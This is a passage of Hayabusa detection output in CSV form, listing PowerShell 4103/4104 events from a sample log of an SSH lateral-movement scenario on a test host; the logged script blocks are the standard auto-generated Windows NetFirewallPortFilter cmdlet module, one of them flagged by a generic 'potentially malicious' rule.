ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.403 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.403 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.404 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.434 
+09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and 
(@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] 
${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires 
-version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] 
${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
